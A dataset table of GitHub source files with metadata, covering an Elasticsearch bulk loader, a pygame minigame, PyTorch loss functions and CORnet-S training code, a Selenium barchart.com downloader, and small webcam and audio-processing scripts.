seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
42754051183 | from datetime import datetime
from elasticsearch import Elasticsearch
from elasticsearch import helpers
import json
import time
# Bulk-index newline-delimited JSON records from yt_data.rst into the
# "youtube" Elasticsearch index, flushing in batches of 20 000 documents.
es = Elasticsearch()
s = time.time()
cnt = 1          # running document id (also doubles as a progress counter)
actions = []     # pending bulk actions, flushed whenever a batch fills up
with open("yt_data.rst") as f:
    # Stream the file line by line instead of loading it all with readlines().
    for line in f:
        actions.append({
            "_index": "youtube",
            "_id": cnt,
            "_source": json.loads(line),
        })
        if len(actions) == 20000:
            helpers.bulk(es, actions)  # flush a full batch
            actions = []
        cnt += 1
        print(cnt)
# Flush whatever is left after the last full batch.
helpers.bulk(es, actions)
e = time.time()
print("{}s".format(e - s))
f.close() | timothyliu0912/db_project | db/c.py | c.py | py | 641 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "elasticsearch.Elasticsearch",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "elasticsearch.helpers... |
44310767729 | import pygame, colors, random, time, sideclass, draw, timer
from random import randint
def collision(player, enemy, player1, screen, WIDTH, HEIGHT):
    """On any player/enemy overlap, show the lose screen and reset the score.

    groupcollide(dokill1=False, dokill2=True) keeps the player sprite but
    removes the enemy sprite that was hit.
    """
    if (pygame.sprite.groupcollide(player, enemy, False, True)):
        draw.drawlose(enemy, screen, WIDTH, HEIGHT)
        player1.score = 0
def side(screen, WIDTH, HEIGHT, clock, timer1, mode):
    """Run the side-scrolling jump level until the player quits or scores 15.

    mode=True is minigame mode (pause the timer and show the end screen);
    mode=False shows the plain win screen instead.
    """
    FPS = 60
    # Initializes the groups of objects
    player1 = sideclass.player(WIDTH, HEIGHT)
    all_players = pygame.sprite.Group()
    all_players.add(player1)
    all_enemy = pygame.sprite.Group()
    enemy1 = sideclass.Enemy(WIDTH, HEIGHT, 5)
    all_enemy.add(enemy1)
    # Loads 2 instances of the same background for scrolling
    background1 = pygame.image.load("backgrounds/jumpback.jpg")
    background2 = pygame.image.load("backgrounds/jumpback.jpg")
    # Displays info to the user playing the game
    draw.info(screen, WIDTH, HEIGHT, 'Score 15 to Move on', 100)
    running = True
    move1 = 800
    move2 = 0
    while running:
        clock.tick(FPS)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                # BUGFIX: return immediately after quitting; the original fell
                # through and kept drawing to a dead display surface, which
                # raises "display Surface quit" on the next blit.
                pygame.quit()
                return
        # Draws the background
        screen.fill(colors.black)
        screen.blit(background1, (move1, 0))
        screen.blit(background2, (move2, 0))
        # Randomly spawns enemies (at most two alive at once, never zero)
        if (random.randrange(0, 100) < 1 and len(all_enemy) < 2) or len(all_enemy) == 0:
            enemy = sideclass.Enemy(WIDTH, HEIGHT, random.randint(5, 8))
            all_enemy.add(enemy)
        # Displays the timer and score
        draw.drawtime(timer1, screen)
        draw.displayscore(screen, WIDTH, HEIGHT, player1.score)
        # Updates player and enemies
        all_players.update(WIDTH, HEIGHT)
        all_enemy.update(all_enemy, player1)
        all_players.draw(screen)
        all_enemy.draw(screen)
        # Detects collision between enemies and players
        collision(all_players, all_enemy, player1, screen, WIDTH, HEIGHT)
        # Sees if the player has reached the limit
        if player1.score == 15:
            if mode:  # If in minigame mode
                timer1.pause()
                draw.drawEnd(screen, WIDTH, HEIGHT, timer1)
            else:
                draw.drawWin(screen, WIDTH, HEIGHT)
            break
        # Controls movement of the background to scroll
        move1 -= 1
        move2 -= 1
        if move2 == -800:
            move2 = 800
        if move1 == -800:
            move1 = 800
        pygame.display.flip()
def main():
    """Driver for minigame mode: create the window, clock and timer, then
    run the side-scrolling level with mode=True."""
    WIDTH = 800
    HEIGHT = 600
    pygame.init()
    screen = pygame.display.set_mode((WIDTH, HEIGHT))
    pygame.display.set_caption("Jump! Minigame Mode")
    clock = pygame.time.Clock()
    timer1 = timer.Timer()
    timer1.start()
    side(screen, WIDTH, HEIGHT, clock, timer1, True)
# Script entry point: run the minigame driver when executed directly.
if __name__=="__main__":
    main()
| RamboTheGreat/Minigame-Race | sidescroll.py | sidescroll.py | py | 2,909 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygame.sprite.groupcollide",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pygame.sprite",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "draw.drawlose",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "sideclass.pl... |
16272104179 | import torch
import torch.nn.functional as F
# Focal Loss with alpha=0.25 and gamma=2 (standard)
class FocalLoss(torch.nn.Module):
    """Binary focal loss on raw logits.

    Easy examples are down-weighted by (1 - pt)**gamma and every term is
    scaled by alpha; the mean over all elements is returned.
    """

    def __init__(self, alpha=0.25, gamma=2):
        super(FocalLoss, self).__init__()
        self.alpha = alpha
        self.gamma = gamma

    def forward(self, pred, targets):
        # Element-wise BCE on logits; reduction is deferred so each term can
        # be re-weighted before averaging.
        per_elem_bce = F.binary_cross_entropy_with_logits(
            pred, targets, reduction='none')
        true_class_prob = torch.exp(-per_elem_bce)
        focal_weight = self.alpha * (1 - true_class_prob) ** self.gamma
        return (focal_weight * per_elem_bce).mean()
# Label Smoothing with smoothing=0.1
class LabelSmoothingLoss(torch.nn.Module):
    """Cross-entropy with label smoothing.

    if smoothing == 0, it's one-hot method
    if 0 < smoothing < 1, it's smooth method

    Expects 2-D logits of shape (batch, classes) and integer targets of
    shape (batch,): target.unsqueeze(1) is scattered along dim 1, so 1-D
    logits raise IndexError (see the traceback preserved below this class).
    """

    def __init__(self, classes=2, smoothing=0.1, dim=-1, weight=None):
        super(LabelSmoothingLoss, self).__init__()
        self.confidence = 1.0 - smoothing  # probability mass on the true class
        self.smoothing = smoothing
        self.weight = weight  # optional per-class weights, shape (classes,)
        self.cls = classes
        self.dim = dim

    def forward(self, pred, target):
        assert 0 <= self.smoothing < 1
        pred = pred.log_softmax(dim=self.dim)
        if self.weight is not None:
            pred = pred * self.weight.unsqueeze(0)
        with torch.no_grad():
            # Smoothed one-hot target: smoothing mass split over the other
            # classes, `confidence` on the true class.
            # BUGFIX: removed the four leftover debug print() calls that
            # dumped target/pred shapes on every forward pass.
            true_dist = torch.zeros_like(pred)
            true_dist.fill_(self.smoothing / (self.cls - 1))
            true_dist.scatter_(1, target.data.unsqueeze(1), self.confidence)
        return torch.mean(torch.sum(-true_dist * pred, dim=self.dim))
'''
torch.Size([1])
torch.Size([1, 1])
torch.Size([1])
torch.Size([1])
Traceback (most recent call last):
File "main.py", line 15, in <module>
main()
File "main.py", line 12, in main
losses,accs,testResults = train(trainArgs)
File "/Midgard/home/martinig/adv-comp-bio/trainAndTest.py", line 54, in train
loss = criterion(y_pred.type(torch.DoubleTensor).squeeze(1),y.type(torch.DoubleTensor))
File "/Midgard/home/martinig/miniconda3/envs/drugVQA/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
return forward_call(*args, **kwargs)
File "/Midgard/home/martinig/adv-comp-bio/loss.py", line 44, in forward
true_dist.scatter_(1, target.data.unsqueeze(1), self.confidence)
IndexError: Dimension out of range (expected to be in range of [-1, 0], but got 1)
''' | martinigoyanes/drugVQA | loss.py | loss.py | py | 2,477 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.functional.binary_cross_entropy_with_logits",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 12,
"usage_type": "name"
},
{
... |
15637256017 | import os
import csv
import sys
import fnmatch
import shutil
import time
import re
import config as cfg
import numpy as np
import pandas as pd
import mysql.connector as mysql
import sqlalchemy
from datetime import datetime
from dateutil.parser import parse
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.webdriver.chrome.options import Options
pathOfFilesDled = r'C:\\Users\\ChadBot\\Downloads\\'
pathToMoveDLStocks = r'C:\Users\\ChadBot\\Desktop\\barchartdata\\Stocks\\'
pathToMoveDLETF = r'C:\Users\\ChadBot\\Desktop\\barchartdata\\ETF\\'
pathToMoveDLIndices= r'C:\Users\\ChadBot\\Desktop\\barchartdata\\Indices\\'
def dlData():
    """Log in to barchart.com with Selenium and download the unusual-options
    CSVs for stocks, ETFs and indices (Chrome saves them to its download dir).
    """
    chrome_options = Options()
    # chrome_options.add_argument("start-minimized")
    driver = webdriver.Chrome(r'C:\chromedriver.exe', options=chrome_options)
    driver.get("https://www.barchart.com/login")
    element = driver.find_element_by_name("email")
    element.send_keys(cfg.login['user'])
    element = driver.find_element_by_name("password")
    element.send_keys(cfg.login['pass'])
    element.send_keys(Keys.RETURN)
    driver.get("https://www.barchart.com/options/unusual-activity/stocks")
    print("stocks")
    driver.find_element_by_xpath("//span[contains(.,'download')]").click()
    time.sleep(5)  # give the browser time to finish the download
    driver.get("https://www.barchart.com/options/unusual-activity/etfs")
    print("etfs")
    driver.find_element_by_xpath("//span[contains(.,'download')]").click()
    time.sleep(5)
    driver.get("https://www.barchart.com/options/unusual-activity/indices")
    print("Indices")
    driver.find_element_by_xpath("//span[contains(.,'download')]").click()
    time.sleep(5)
    driver.quit()
'''
This function has been deprecated
Bot will not sort csv files and save them in folders or upload to git
New functions implemented to clean up data and push to MySQL DB instead
'''
def sortData():
    """DEPRECATED: move downloaded barchart CSVs from the browser download
    directory into per-category folders (ETF / Indices / Stocks).

    Exits the process via sys.exit() if any move fails, as before.
    """
    # (pattern, destination) pairs replace three copy-pasted loops; the
    # patterns are mutually exclusive, matching the original behavior of
    # checking each one independently per file.
    routes = [
        ('*-etfs-*-*-*-*-*.csv', pathToMoveDLETF),
        ('*-indices-*-*-*-*-*.csv', pathToMoveDLIndices),
        ('*-stocks-*-*-*-*-*.csv', pathToMoveDLStocks),
    ]
    for f_name in os.listdir(pathOfFilesDled):
        for pattern, dest in routes:
            if fnmatch.fnmatch(f_name, pattern):
                try:
                    shutil.move(pathOfFilesDled + f_name, dest)
                    print("File Moved: " + f_name)
                except IOError:
                    print("Could not move files")
                    sys.exit()
'''
Function also deprecated after cleaning past data
'''
def cleanData(dataPath):
    """Normalize one downloaded barchart CSV in place.

    Strips stray quotes, prepends a 'Date Inserted' column parsed from the
    MM-DD-YY date embedded in the file name, renames 'Last Trade' to 'Time',
    normalizes the IV / Exp Date / Time columns, drops the trailing footer
    row, and overwrites dataPath with the cleaned frame.
    """
    df = pd.read_csv(dataPath).replace('"', '', regex=True)
    # Raw string so \d is a regex class, not a deprecated string escape.
    dateRgx = re.compile(r'(\d{2}-\d{2}-\d{2})')
    dateList = dateRgx.findall(dataPath)
    dateStr = str(dateList[0])
    # The regex guarantees MM-DD-YY, so stdlib strptime replaces the
    # third-party dateutil parse with identical results.
    dateT = datetime.strptime(dateStr, '%m-%d-%y').strftime('%Y-%m-%d')
    df.insert(0, 'Date Inserted', dateT)
    df = df.set_index('Date Inserted')
    df.rename(columns={'Last Trade': 'Time'}, inplace=True)
    df['IV'] = df['IV'].astype(str).str.rstrip('%').astype(float)
    df['Exp Date'] = pd.to_datetime(df['Exp Date'])
    df['Exp Date'] = df['Exp Date'].dt.strftime('%Y-%m-%d')
    df['Time'] = pd.to_datetime(df['Time'])
    df['Time'] = df['Time'].dt.strftime('%H:%M')
    df = df[:-1]  # drop the trailing summary row barchart appends
    # BUGFIX: call head(); the original printed the bound method object.
    print(df.head())
    df.to_csv(dataPath)
'''
This function is used to clean existing data that was already scraped
No need to use this function again because new data downloaded will be cleaned
and pushed to MySQL DB
'''
def cleanUpExistingData():
    """One-off pass that runs cleanData over every already-scraped CSV.

    No need to run this again: newly downloaded data is cleaned before
    being pushed to the MySQL DB.
    """
    # (folder, pattern, success message) triples replace three copy-pasted
    # loops with identical structure.
    jobs = [
        (r"A:\\git\\ChadBot\\barchart\\ETF\\", '*-etfs-*-*-*-*-*.csv', "ETFs Cleaned"),
        (r"A:\\git\\ChadBot\\barchart\\Indices\\", '*-indices-*-*-*-*-*.csv', "Indices Cleaned"),
        (r"A:\\git\\ChadBot\\barchart\\Stocks\\", '*-stocks-*-*-*-*-*.csv', "Stocks Cleaned"),
    ]
    for folder, pattern, done_msg in jobs:
        for f_name in os.listdir(folder):
            if fnmatch.fnmatch(f_name, pattern):
                try:
                    cleanData(folder + f_name)
                    print(done_msg)
                except ValueError as e:
                    print(e)
def POSTtoDB():
    """Insert one cleaned stocks CSV into the MySQL `barchart.stocks` table."""
    stockPath = r"A:\\git\\ChadBot\\barchart\\Stocks\\"
    db = mysql.connect(
        host=cfg.dbLogin['host'],
        user=cfg.dbLogin['user'],
        password=cfg.dbLogin['pass'],
        database='barchart'
    )
    cursor = db.cursor()
    cursor.execute("SHOW TABLES")
    databases = cursor.fetchall()
    print(databases)
    with open(stockPath + 'unusual-stocks-options-activity-02-14-2020.csv') as csv_file:
        csv_reader = csv.reader(csv_file, delimiter=',')
        # BUGFIX: skip the header row; the original inserted the column
        # names as a data row.
        next(csv_reader, None)
        for row in csv_reader:
            print(row)
            cursor.execute(
                '''INSERT INTO stocks(Date_Inserted, Symbol, Price, Type, Strike, Exp_Date, DTE, Bid, Midpoint, Ask, Last, Volume, Open_Int, Vol_OI, IV, Time) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)''',
                (row))
    # BUGFIX: commit on the connection; mysql.connector cursors have no
    # commit(), so the original raised AttributeError and lost the inserts.
    db.commit()
# Daily entry point: download the CSVs, then (deprecated) sort them into
# folders; the DB-push and one-off cleanup paths are left disabled.
if __name__ == "__main__":
    dlData()
    sortData()
    sys.exit()
    # POSTtoDB()
    # cleanUpExistingData()
| xxwikkixx/ChadBot | barchart/barchartDl.py | barchartDl.py | py | 6,546 | python | en | code | 16 | github-code | 36 | [
{
"api_name": "selenium.webdriver.chrome.options.Options",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 28,
"usage_type": "name"
},
{... |
38164556201 | import glob
import importlib
import io
import logging
import os
import shlex
import subprocess
import time
import cornet
import numpy as np
import pandas
import torch
import torch.nn as nn
import torch.utils.model_zoo
import torchvision
import tqdm
from PIL import Image
from torch.nn import Module
Image.warnings.simplefilter('ignore')
logger = logging.getLogger(__name__)
torch.backends.cudnn.benchmark = False
normalize = torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
ngpus = 2
epochs = 1
output_path = '/braintree/home/fgeiger/weight_initialization/base_models/model_weights/' # os.path.join(os.path.dirname(__file__), 'model_weights/')
data_path = '/braintree/data2/active/common/imagenet_raw/' if 'IMAGENET' not in os.environ else \
os.environ['IMAGENET']
batch_size = 256
weight_decay = 1e-4
momentum = .9
step_size = 20
lr = .1
workers = 20
if ngpus > 0:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def set_gpus(n=2):
    """
    Finds all GPUs on the system and restricts to n of them that have the most
    free memory.
    """
    # BUGFIX: with a pre-split argument list, shell=True makes the shell run
    # only 'nvidia-smi' and silently drop the query flags; pass the list
    # directly instead.
    gpus = subprocess.run(shlex.split(
        'nvidia-smi --query-gpu=index,memory.free,memory.total --format=csv,nounits'),
        check=True, stdout=subprocess.PIPE).stdout
    gpus = pandas.read_csv(io.BytesIO(gpus), sep=', ', engine='python')
    print(gpus)
    gpus = gpus[gpus['memory.total [MiB]'] > 10000]  # only above 10 GB
    if os.environ.get('CUDA_VISIBLE_DEVICES') is not None:
        visible = [int(i)
                   for i in os.environ['CUDA_VISIBLE_DEVICES'].split(',')]
        gpus = gpus[gpus['index'].isin(visible)]
    print(f'GPUs {gpus}')
    gpus = gpus.sort_values(by='memory.free [MiB]', ascending=False)
    os.environ[
        'CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'  # making sure GPUs are numbered the same way as in nvidia_smi
    os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(
        [str(i) for i in gpus['index'].iloc[:n]])
def get_model(pretrained=False):
    """Build a CORnet-S model; CPU-only runs unwrap DataParallel, GPU runs
    move the model to CUDA."""
    map_location = None if ngpus > 0 else 'cpu'
    model = getattr(cornet, f'cornet_S')
    model = model(pretrained=pretrained, map_location=map_location)
    if ngpus == 0:
        model = model.module  # remove DataParallel
    if ngpus > 0:
        model = model.cuda()
    return model
def train(identifier,
          model,
          restore_path=None,  # useful when you want to restart training
          save_train_epochs=1,  # how often save output during training
          save_val_epochs=.5,  # how often save output during validation
          save_model_epochs=1,  # how often save model weigths
          save_model_secs=60 * 10,  # how often save model (in sec)
          areas=None
          ):
    """Train `model` on ImageNet for the module-level `epochs` epochs.

    Returns {'time': wall-clock seconds for the whole run}.
    """
    restore_path = output_path
    logger.info('We start training the model')
    if ngpus > 1 and torch.cuda.device_count() > 1:
        logger.info('We have multiple GPUs detected')
        model = nn.DataParallel(model)
        model = model.to(device)
    # BUGFIX: `is 1` compares object identity and only works due to CPython
    # small-int interning; use == for a value comparison.
    elif ngpus > 0 and torch.cuda.device_count() == 1:
        logger.info('We run on one GPU')
        model = model.to(device)
    else:
        logger.info('No GPU detected!')
    trainer = ImageNetTrain(model, areas)
    validator = ImageNetVal(model)
    start_epoch = 0
    recent_time = time.time()
    for epoch in tqdm.trange(start_epoch, epochs, initial=start_epoch, desc='epoch'):
        data_load_start = np.nan
        for step, data in enumerate(tqdm.tqdm(trainer.data_loader, desc=trainer.name)):
            data_load_time = time.time() - data_load_start
            global_step = epoch * len(trainer.data_loader) + step
            trainer.model.train()
            # Fraction of an epoch completed, used to drive the LR schedule.
            frac_epoch = (global_step + 1) / len(trainer.data_loader)
            trainer(frac_epoch, *data)
            data_load_start = time.time()
    duration = time.time() - recent_time
    return {'time': duration}
def test(layer='decoder', sublayer='avgpool', time_step=0, imsize=224):
    """
    Suitable for small image sets. If you have thousands of images or it is
    taking too long to extract features, consider using
    `torchvision.datasets.ImageFolder`, using `ImageNetVal` as an example.

    Kwargs:
        - layers (choose from: V1, V2, V4, IT, decoder)
        - sublayer (e.g., output, conv1, avgpool)
        - time_step (which time step to use for storing features)
        - imsize (resize image to how many pixels, default: 224)
    """
    model = get_model(pretrained=True)
    transform = torchvision.transforms.Compose([
        torchvision.transforms.Resize((imsize, imsize)),
        torchvision.transforms.ToTensor(),
        normalize,
    ])
    model.eval()

    def _store_feats(layer, inp, output):
        """An ugly but effective way of accessing intermediate model features
        """
        # Appends to the _model_feats list bound in the loop below (closure).
        _model_feats.append(np.reshape(output, (len(output), -1)).numpy())

    try:
        m = model.module
    except:
        m = model
    model_layer = getattr(getattr(m, layer), sublayer)
    model_layer.register_forward_hook(_store_feats)

    model_feats = []
    with torch.no_grad():
        model_feats = []
        fnames = sorted(glob.glob(os.path.join(data_path, '*.*')))
        if len(fnames) == 0:
            raise Exception(f'No files found in {data_path}')
        for fname in tqdm.tqdm(fnames):
            try:
                im = Image.open(fname).convert('RGB')
            except:
                raise Exception(f'Unable to load {fname}')
            im = transform(im)
            im = im.unsqueeze(0)  # adding extra dimension for batch size of 1
            # Reset per image; the forward hook fills it, one entry per time step.
            _model_feats = []
            model(im)
            model_feats.append(_model_feats[time_step])
    model_feats = np.concatenate(model_feats)
    if output_path is not None:
        fname = f'CORnet-{model}_{layer}_{sublayer}_feats.npy'
        np.save(os.path.join(output_path, fname), model_feats)
class ImageNetTrain(object):
    """Training helper: owns the train DataLoader, SGD optimizer, StepLR
    schedule and cross-entropy loss for one model.

    Calling the instance runs a single optimization step.
    """

    def __init__(self, model, config):
        # NOTE(review): `config` is accepted but never read here — confirm
        # whether callers rely on it elsewhere.
        self.name = 'train'
        self.model = model
        self.data_loader = self.data()
        self.optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad, model.parameters()),
                                         lr,
                                         momentum=momentum,
                                         weight_decay=weight_decay)
        self.lr = torch.optim.lr_scheduler.StepLR(self.optimizer, step_size=step_size)
        self.loss = nn.CrossEntropyLoss()
        if ngpus > 0:
            self.loss = self.loss.cuda()

    def data(self):
        # Standard ImageNet train-time augmentation pipeline.
        dataset = torchvision.datasets.ImageFolder(
            os.path.join(data_path, 'train'),
            torchvision.transforms.Compose([
                torchvision.transforms.RandomResizedCrop(224),
                torchvision.transforms.RandomHorizontalFlip(),
                torchvision.transforms.ToTensor(),
                normalize,
            ]))
        data_loader = torch.utils.data.DataLoader(dataset,
                                                  batch_size=batch_size,
                                                  shuffle=True,
                                                  num_workers=workers,
                                                  pin_memory=True)
        return data_loader

    def __call__(self, frac_epoch, inp, target):
        """Run one optimization step on (inp, target); returns step metrics."""
        start = time.time()
        # NOTE(review): passing epoch= to StepLR.step() is deprecated in
        # newer torch releases — confirm the pinned torch version supports it.
        self.lr.step(epoch=frac_epoch)
        with torch.autograd.detect_anomaly():
            if ngpus > 0:
                inp = inp.to(device)
                target = target.cuda(non_blocking=True)
            output = self.model(inp)
            record = {}
            loss = self.loss(output, target)
            record['loss'] = loss.item()
            record['top1'], record['top5'] = accuracy(output, target, topk=(1, 5))
            # accuracy() returns raw correct counts; normalize by batch size.
            record['top1'] /= len(output)
            record['top5'] /= len(output)
            record['learning_rate'] = self.lr.get_lr()[0]
            self.optimizer.zero_grad()
            loss.backward()
            self.optimizer.step()
        record['dur'] = time.time() - start
        return record
class ImageNetVal(object):
    """Validation helper: owns the val DataLoader and a summed cross-entropy
    loss; calling the instance evaluates the whole validation set."""

    def __init__(self, model):
        self.name = 'val'
        self.model = model
        self.data_loader = self.data()
        # NOTE(review): size_average is deprecated in newer torch versions;
        # reduction='sum' is the modern equivalent — confirm pinned version.
        self.loss = nn.CrossEntropyLoss(size_average=False)
        if ngpus > 0:
            self.loss = self.loss.cuda()

    def data(self):
        # Standard ImageNet eval pipeline: resize shorter side, center crop.
        dataset = torchvision.datasets.ImageFolder(
            os.path.join(data_path, 'val'),
            torchvision.transforms.Compose([
                torchvision.transforms.Resize(256),
                torchvision.transforms.CenterCrop(224),
                torchvision.transforms.ToTensor(),
                normalize,
            ]))
        data_loader = torch.utils.data.DataLoader(dataset,
                                                  batch_size=batch_size,
                                                  shuffle=False,
                                                  num_workers=workers,
                                                  pin_memory=True)
        return data_loader

    def __call__(self):
        """Evaluate on the full val set; returns mean loss / top1 / top5."""
        self.model.eval()
        start = time.time()
        record = {'loss': 0, 'top1': 0, 'top5': 0}
        with torch.no_grad():
            for (inp, target) in tqdm.tqdm(self.data_loader, desc=self.name):
                if ngpus > 0:
                    inp = inp.to(device)
                    target = target.to(device)
                output = self.model(inp)
                record['loss'] += self.loss(output, target).item()
                p1, p5 = accuracy(output, target, topk=(1, 5))
                record['top1'] += p1
                record['top5'] += p5
        # Normalize the summed metrics by the dataset size.
        for key in record:
            record[key] /= len(self.data_loader.dataset.samples)
        record['dur'] = (time.time() - start) / len(self.data_loader)
        print(f'Validation accuracy: Top1 {record["top1"]}, Top5 {record["top5"]}\n')
        return record
def accuracy(output, target, topk=(1,)):
    """Computes the precision@k for the specified values of k.

    Returns raw correct counts (not normalized) for each k in topk.
    """
    with torch.no_grad():
        top_count = max(topk)
        _, predicted = output.topk(top_count, dim=1, largest=True, sorted=True)
        predicted = predicted.t()
        # Row k of `hits` marks samples whose k-th ranked prediction matches.
        hits = predicted.eq(target.view(1, -1).expand_as(predicted))
        return [hits[:k].sum().item() for k in topk]
# Ad-hoc comparison script: load two checkpoints of CORnet-S and report,
# parameter by parameter, whether the restored weights equal the pretrained
# reference model's weights.
if __name__ == '__main__':
    identifier = 'CORnet-S_cluster2_v2_IT_trconv3_bi_epoch_00'
    mod = importlib.import_module(f'cornet.cornet_s')
    model_ctr = getattr(mod, f'CORnet_S')
    model = model_ctr()
    model3 = cornet.cornet_s(False)
    model2 = model_ctr()
    if os.path.exists(output_path + f'{identifier}.pth.tar'):
        logger.info('Resore weights from stored results')
        checkpoint = torch.load(output_path + f'{identifier}.pth.tar',
                                map_location=lambda storage, loc: storage)

        # NOTE(review): Wrapper is defined but never instantiated here.
        class Wrapper(Module):
            def __init__(self, model):
                super(Wrapper, self).__init__()
                self.module = model

        model.load_state_dict(checkpoint['state_dict'])
    if os.path.exists(output_path + f'CORnet-S_cluster2_IT_full_train_epoch_00.pth.tar'):
        logger.info('Resore weights from stored results')
        checkpoint2 = torch.load(
            output_path + f'CORnet-S_cluster2_v2_IT_trconv3_bi_seed31_epoch_00.pth.tar',
            map_location=lambda storage, loc: storage)
        checkpoint3 = torch.load(
            output_path + f'CORnet-S_cluster2_v2_IT_trconv3_bi_seed42_epoch_00.pth.tar',
            map_location=lambda storage, loc: storage)  # map onto cpu
        model2.load_state_dict(checkpoint2['state_dict'])
    # Compare every parameter shared by both models element-wise.
    for name, m in model2.module.named_parameters():
        for name2, m2 in model3.named_parameters():
            if name == name2:
                print(name)
                value1 = m.data.cpu().numpy()
                value2 = m2.data.cpu().numpy()
                print((value1 == value2).all())
| franzigeiger/training_reductions | base_models/trainer_performance.py | trainer_performance.py | py | 12,170 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "PIL.Image.warnings.simplefilter",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "PIL.Image.warnings",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "PIL.Image",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "log... |
22234739193 | from pykinect2 import PyKinectV2
from pykinect2.PyKinectV2 import *
from pykinect2 import PyKinectRuntime
import numpy as np
import cv2
import time
# kinect = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color)
# while True:
# if kinect.has_new_color_frame():
# frame = kinect.get_last_color_frame()
# print(np.shape(frame))
# time.sleep(0.5)
# Webcam-based circle-grid detection test (the Kinect capture above is
# commented out; a normal cv2 camera is used instead). Press Esc to quit.
cap = cv2.VideoCapture(0)
while True:
    updated, frame = cap.read()
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    cols = 9
    rows = 6
    # findCirclesGrid takes (num_cols,num_rows)
    ret, corners = cv2.findCirclesGrid(gray, (cols, rows), None)
    # once the grid is found, press a button to start tracking and make everything around it dark
    # if it's not a dark point, then make it white
    ret1, thresh = cv2.threshold(gray, 100, 255, cv2.THRESH_TOZERO)
    cv2.drawChessboardCorners(thresh, (cols, rows), corners, ret)
    cv2.imshow('thresh', thresh)
    k = cv2.waitKey(1)
    if k == 27:  # Esc key
        break
cv2.destroyAllWindows() | zachvin/KinectImaging | tests.py | tests.py | py | 996 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "cv2.findCircles... |
5577508746 | import json
# Read whitespace-separated firm records from firm.txt, compute each firm's
# profit from fields [2] - [3], then write the per-firm profits plus the
# average profit of profitable firms to firm.json.
with open('firm.txt', 'r', encoding='utf-8') as f:
    data = []
    for line in f:
        line = line.replace("\n", "")
        string = line.split(" ")
        data.append(string)
average = 0
avg_firms = 0
diction = {}
for el in data:
    profit = int(el[2]) - int(el[3])
    diction.update({el[0]: profit})
    if profit > 0:
        average = average + profit
        avg_firms += 1
# BUGFIX: guard against ZeroDivisionError when no firm is profitable.
average = average / avg_firms if avg_firms else 0
avg_dict = {"Average profit": average}
summary = [diction, avg_dict]
with open('firm.json', 'w', encoding='utf-8') as f:
    json.dump(summary, f)
| Ilyagradoboev/geekproject | lesson_5.7.py | lesson_5.7.py | py | 580 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.dump",
"line_number": 25,
"usage_type": "call"
}
] |
30351631272 |
def load_and_get_stats(filename):
    """Reads .wav file and returns data, sampling frequency, and length (time) of audio clip."""
    import scipy.io.wavfile as siow
    rate, samples = siow.read(filename)
    # Duration in seconds = number of samples / samples-per-second.
    duration = samples.shape[0] / rate
    return rate, samples, duration
def plot_wav_curve(filename, sampling_rate, amplitude_vector, wav_length):
    """Plots amplitude curve for a particular audio clip."""
    import matplotlib.pyplot as plt
    import numpy as np
    # Evenly spaced time axis spanning the clip, one point per sample.
    time = np.linspace(0, wav_length, amplitude_vector.shape[0])
    plt.plot(time, amplitude_vector)
    plt.xlabel('Time [s]')
    plt.ylabel('Amplitude')
    # NOTE(review): `filename` is unused; the title was possibly meant to
    # interpolate it instead of the literal "(unknown)".
    plt.title(f'(unknown) - viewed at {sampling_rate} samples/sec')
    plt.show()
def split_audio_into_chunks(sampling_rate, amplitude_vector, chunk_size):
    """Reshape data (amplitude vector) into many chunks of chunk_size miliseconds. Returns reshaped data and leftover data not grouped."""
    # Samples per chunk: chunk_size ms divided by the per-sample period in ms.
    samples_per_chunk = int(chunk_size / ((1 / sampling_rate) * 1000))
    n_chunks = len(amplitude_vector) // samples_per_chunk
    split_at = n_chunks * samples_per_chunk
    grouped, leftover = amplitude_vector[:split_at], amplitude_vector[split_at:]
    return grouped.reshape((n_chunks, samples_per_chunk)), leftover
def apply_fourier_transform(chunked_audio):
    """Apply fourier transform to chunked audio snippets to break up each chunk into vector of scores for each frequency band. Aggregates score vectors for each snippet into spectogram to be fed into neural network."""
    pass  # not implemented yet
# Quick manual check: load a sample clip (results feed the chunking call below).
if __name__ == '__main__':
    sampling_rate, amplitude_vector, wav_length = load_and_get_stats('hello.wav')
